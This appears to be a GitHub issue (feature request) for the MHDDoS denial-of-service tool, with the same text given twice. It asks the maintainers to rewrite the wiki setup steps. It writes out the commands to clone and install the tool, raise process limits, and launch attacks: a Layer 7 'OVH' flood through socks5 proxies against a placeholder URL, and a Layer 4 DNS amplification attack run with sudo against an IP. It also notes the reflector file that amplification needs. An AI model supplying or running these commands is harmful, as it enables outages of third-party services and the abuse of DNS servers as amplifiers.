Is your feature request related to a problem? Please describe the problem.
please delete it all and do it all over again like me
sudo apt update
ulimit -u999999
ulimit -n999999
git clone https://github.com/MatrixTM/MHDDoS.git
cd MHDDoS
sudo pip install -r requirements.txt
sudo pip3 install requests -U
done
with L7 style, use normal command :
python3 start.py OVH http://www.xxx.com/ 5 1000 socks5.txt 100 100
with L4 attack, you have to add sudo in front
sudo python3 start.py DNS 1.2.3.4:186 1 100 dns.txt true
Note with Layer4 Amplification attack: you must put the file dnd.txt in the path files
Describe the solution you'd like
please update again step by step as i mentioned to avoid error
Which section is this feature request for?
Wiki
Is there an existing issue for this?
Is your feature request related to a problem? Please describe the problem.
please delete it all and do it all over again like me sudo apt update ulimit -u999999 ulimit -n999999 git clone https://github.com/MatrixTM/MHDDoS.git cd MHDDoS sudo pip install -r requirements.txt sudo pip3 install requests -U
done
with L7 style, use normal command : python3 start.py OVH http://www.xxx.com/ 5 1000 socks5.txt 100 100
with L4 attack, you have to add sudo in front sudo python3 start.py DNS 1.2.3.4:186 1 100 dns.txt true
Note with Layer4 Amplification attack: you must put the file dnd.txt in the path files
Describe the solution you'd like
please update again step by step as i mentioned to avoid error
Additional context
No response